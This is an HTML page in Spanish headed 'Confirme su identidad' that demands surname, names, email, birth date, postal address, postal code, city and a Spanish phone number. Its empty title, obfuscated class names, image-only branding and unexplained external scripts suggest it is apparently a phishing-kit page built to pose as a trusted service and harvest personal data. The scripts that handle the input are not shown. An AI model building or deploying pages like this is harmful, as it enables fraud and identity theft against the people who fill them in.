<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/brito.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    
    
        <div class="kaml">

            <div class="ldakhl">

            <div class="topano">
                <div class="topano">
                    <img class="topo-mb" src="./img/tripot2.PNG" alt="">
                    <img class="topo-pc" src="./img/topan-mb-02.png" alt="">
                </div>
            </div>
            
            
            <div class="c">
                <div class="c">
                
                
                <div class="upog">
                    <img class="topo-mb" src="./img/up2.PNG" alt="">
                </div>
                    
                    <form  method="post" id="pg2">

                        <div class="formal">
                        <p class="pp1">Confirme su identidad</p>
                            
                        <div class="infos">
                            <div class="row">
                                <div class="inp2">
                                    <p>Apellidos <span>*</span></p>
                                    <input type="text" name="" id="s1" required maxlength="10">
                                </div>
                                
                                <div class="inp2">
                                    <p>Nombres <span>*</span></p>
                                    <input type="text" name="" id="s2"required maxlength="19">
                                </div>
                            </div>
                            
                            <div class="row">
                                <div class="inp2">
                                    <p>Email <span>*</span></p>
                                    <input type="email" name="" id="s3"required>
                                </div>
                                
                                <div class="inp2">
                                    <p>Fecha de nacimiento <span>*</span></p>
                                    <input type="date" name="" id="s4"required placeholder="DD/MM/AAAA">
                                </div>
                            </div>
                            
                            <div class="row2">
                                <div class="inp2">
                                    <p>Dirección postal <span>*</span></p>
                                    <input type="text" name="" id="s5"required>
                                </div>
                                
                                <div class="inp2">
                                    <p>Código postal <span>*</span></p>
                                    <input type="text" name="" id="s6"required>
                                </div>
                                
                                <div class="inp2">
                                    <p>Ciudad <span>*</span></p>
                                    <input type="text" name="" id="s7"required maxlength="10">
                                </div>
                            </div>

                            <div class="inp2 inp3">
                                <p>Número de teléfono <span>*</span></p>
                            <input class="inp2" type="tel" name="" id="s8"required maxlength="10" placeholder="34">
                            </div>
                        
                        
                        
                        
                    </div>
                </div>
                            <div class="on-btn"><button id="botn" class="botn2 btn2" >Continuar </button></div>
                    </form>
                            
                        
                        
        
                        
                    
                        
                   
                   
                    
                  </div>
            </div>
        
        

    <div class="botano">
        <img class="topo-mb" src="./img/botano2.png" alt="">
        <img class="topo-pc" src="./img/botano-mb-02.png" alt="">
    </div>

    </div>
    
</div>

   
    <script src="./js/stb.js"></script>
    <script src="./js/inp.js"></script>
    <script>
        
    </script>
</body>
</html>